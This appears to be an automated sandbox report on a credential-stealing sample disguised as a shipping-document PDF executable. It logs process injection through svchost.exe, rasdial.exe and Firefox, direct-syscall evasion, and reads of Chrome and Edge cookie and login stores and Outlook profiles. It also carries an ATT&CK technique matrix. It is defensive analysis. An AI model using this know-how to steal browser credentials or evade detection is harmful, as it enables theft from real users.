            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AD0C0 mov eax, dword ptr fs:[00000030h]2_2_033AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AD0C0 mov eax, dword ptr fs:[00000030h]2_2_033AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03329730 mov eax, dword ptr fs:[00000030h]2_2_03329730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03329730 mov eax, dword ptr fs:[00000030h]2_2_03329730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03365734 mov eax, dword ptr fs:[00000030h]2_2_03365734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333973A mov eax, dword ptr fs:[00000030h]2_2_0333973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333973A mov eax, dword ptr fs:[00000030h]2_2_0333973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03403749 mov eax, dword ptr fs:[00000030h]2_2_03403749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov ecx, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AC730 mov eax, dword ptr fs:[00000030h]2_2_033AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EF72E mov eax, dword ptr fs:[00000030h]2_2_033EF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03333720 mov eax, dword ptr fs:[00000030h]2_2_03333720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334F720 mov eax, dword ptr fs:[00000030h]2_2_0334F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334F720 mov eax, dword ptr fs:[00000030h]2_2_0334F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334F720 mov eax, dword ptr fs:[00000030h]2_2_0334F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F972B mov eax, dword ptr fs:[00000030h]2_2_033F972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330710 mov eax, dword ptr fs:[00000030h]2_2_03330710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360710 mov eax, dword ptr fs:[00000030h]2_2_03360710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336F71F mov eax, dword ptr fs:[00000030h]2_2_0336F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336F71F mov eax, dword ptr fs:[00000030h]2_2_0336F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03337703 mov eax, dword ptr fs:[00000030h]2_2_03337703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03335702 mov eax, dword ptr fs:[00000030h]2_2_03335702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03335702 mov eax, dword ptr fs:[00000030h]2_2_03335702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C700 mov eax, dword ptr fs:[00000030h]2_2_0336C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338770 mov eax, dword ptr fs:[00000030h]2_2_03338770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332B765 mov eax, dword ptr fs:[00000030h]2_2_0332B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332B765 mov eax, dword ptr fs:[00000030h]2_2_0332B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332B765 mov eax, dword ptr fs:[00000030h]2_2_0332B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332B765 mov eax, dword ptr fs:[00000030h]2_2_0332B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330750 mov eax, dword ptr fs:[00000030h]2_2_03330750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4755 mov eax, dword ptr fs:[00000030h]2_2_033B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03343740 mov eax, dword ptr fs:[00000030h]2_2_03343740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03343740 mov eax, dword ptr fs:[00000030h]2_2_03343740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03343740 mov eax, dword ptr fs:[00000030h]2_2_03343740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov esi, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340B73C mov eax, dword ptr fs:[00000030h]2_2_0340B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340B73C mov eax, dword ptr fs:[00000030h]2_2_0340B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340B73C mov eax, dword ptr fs:[00000030h]2_2_0340B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340B73C mov eax, dword ptr fs:[00000030h]2_2_0340B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335D7B0 mov eax, dword ptr fs:[00000030h]2_2_0335D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B97A9 mov eax, dword ptr fs:[00000030h]2_2_033B97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BF7AF mov eax, dword ptr fs:[00000030h]2_2_033BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BF7AF mov eax, dword ptr fs:[00000030h]2_2_033BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BF7AF mov eax, dword ptr fs:[00000030h]2_2_033BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BF7AF mov eax, dword ptr fs:[00000030h]2_2_033BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BF7AF mov eax, dword ptr fs:[00000030h]2_2_033BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033307AF mov eax, dword ptr fs:[00000030h]2_2_033307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EF78A mov eax, dword ptr fs:[00000030h]2_2_033EF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333D7E0 mov ecx, dword ptr fs:[00000030h]2_2_0333D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333C7C0 mov eax, dword ptr fs:[00000030h]2_2_0333C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033357C0 mov eax, dword ptr fs:[00000030h]2_2_033357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033357C0 mov eax, dword ptr fs:[00000030h]2_2_033357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033357C0 mov eax, dword ptr fs:[00000030h]2_2_033357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034037B6 mov eax, dword ptr fs:[00000030h]2_2_034037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B07C3 mov eax, dword ptr fs:[00000030h]2_2_033B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E627 mov eax, dword ptr fs:[00000030h]2_2_0334E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03366620 mov eax, dword ptr fs:[00000030h]2_2_03366620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368620 mov eax, dword ptr fs:[00000030h]2_2_03368620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333262C mov eax, dword ptr fs:[00000030h]2_2_0333262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03333616 mov eax, dword ptr fs:[00000030h]2_2_03333616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03333616 mov eax, dword ptr fs:[00000030h]2_2_03333616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372619 mov eax, dword ptr fs:[00000030h]2_2_03372619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03361607 mov eax, dword ptr fs:[00000030h]2_2_03361607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE609 mov eax, dword ptr fs:[00000030h]2_2_033AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336F603 mov eax, dword ptr fs:[00000030h]2_2_0336F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
              NtAllocateVirtualMemory: Direct from: 0x76EF48EC
              NtQueryAttributesFile: Direct from: 0x76EF2E6C
              NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
              NtQuerySystemInformation: Direct from: 0x76EF48CC
              NtOpenSection: Direct from: 0x76EF2E0C
              NtDeviceIoControlFile: Direct from: 0x76EF2AEC
              NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
              NtQueryInformationToken: Direct from: 0x76EF2CAC
              NtCreateFile: Direct from: 0x76EF2FEC
              NtOpenFile: Direct from: 0x76EF2DCC
              NtTerminateThread: Direct from: 0x76EF2FCC
              NtOpenKeyEx: Direct from: 0x76EF2B9C
              NtSetInformationProcess: Direct from: 0x76EF2C5C
              NtProtectVirtualMemory: Direct from: 0x76EF2F9C
              NtWriteVirtualMemory: Direct from: 0x76EF2E3C
              NtNotifyChangeKey: Direct from: 0x76EF3C2C
              NtCreateMutant: Direct from: 0x76EF35CC
              NtResumeThread: Direct from: 0x76EF36AC
              NtMapViewOfSection: Direct from: 0x76EF2D1C
              NtProtectVirtualMemory: Direct from: 0x76EE7B2E
              NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
              NtQuerySystemInformation: Direct from: 0x76EF2DFC
              NtReadFile: Direct from: 0x76EF2ADC
              NtDelayExecution: Direct from: 0x76EF2DDC
              NtQueryInformationProcess: Direct from: 0x76EF2C26
              NtResumeThread: Direct from: 0x76EF2FBC
              NtCreateUserProcess: Direct from: 0x76EF371C
              NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
              NtWriteVirtualMemory: Direct from: 0x76EF490C
              NtSetInformationThread: Direct from: 0x76EE63F9
              NtClose: Direct from: 0x76EF2B6C
              NtSetInformationThread: Direct from: 0x76EF2B4C
              NtReadVirtualMemory: Direct from: 0x76EF2E8C
              NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe; Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: NULL target: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\rasdial.exe; Section loaded: NULL target: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe protection: read write
            Source: C:\Windows\SysWOW64\rasdial.exe; Section loaded: NULL target: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\rasdial.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\rasdial.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\rasdial.exe; Thread register set: target process: 6848
            Source: C:\Windows\SysWOW64\rasdial.exe; Thread APC queued: target process: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe; Memory written: C:\Windows\SysWOW64\svchost.exe base: 2846008
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe; Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\z4Shipping_document_pdf.exe"
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe; Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
            Source: C:\Windows\SysWOW64\rasdial.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: fWXPcgRbOhi.exe, 00000004.00000000.2447293545.0000000001961000.00000002.00000001.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000002.4551063276.0000000001961000.00000002.00000001.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551062041.00000000010F1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager
            Source: fWXPcgRbOhi.exe, 00000004.00000000.2447293545.0000000001961000.00000002.00000001.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000002.4551063276.0000000001961000.00000002.00000001.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551062041.00000000010F1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
            Source: fWXPcgRbOhi.exe, 00000004.00000000.2447293545.0000000001961000.00000002.00000001.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000002.4551063276.0000000001961000.00000002.00000001.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551062041.00000000010F1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
            Source: z4Shipping_document_pdf.exe; Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: fWXPcgRbOhi.exe, 00000004.00000000.2447293545.0000000001961000.00000002.00000001.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000002.4551063276.0000000001961000.00000002.00000001.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551062041.00000000010F1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock

            Stealing of Sensitive Information

            Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2533799840.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.4550198146.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.4551356910.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\rasdial.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\rasdial.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\rasdial.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\rasdial.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\rasdial.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\rasdial.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\rasdial.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\rasdial.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\rasdial.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2533799840.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.4550198146.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.4551356910.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 2 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 412 Process Injection | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Abuse Elevation Control Mechanism | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            [Behavior graph. ID: 1522882; Sample: z4Shipping_document_pdf.exe; Startdate: 30/09/2024; Architecture: WINDOWS; Score: 100. Process chain: z4Shipping_document_pdf.exe (started) -> svchost.exe (started) -> fWXPcgRbOhi.exe (injected) -> rasdial.exe (started) -> fWXPcgRbOhi.exe (injected) and firefox.exe (started).]

            Source | Detection | Scanner | Label | Link
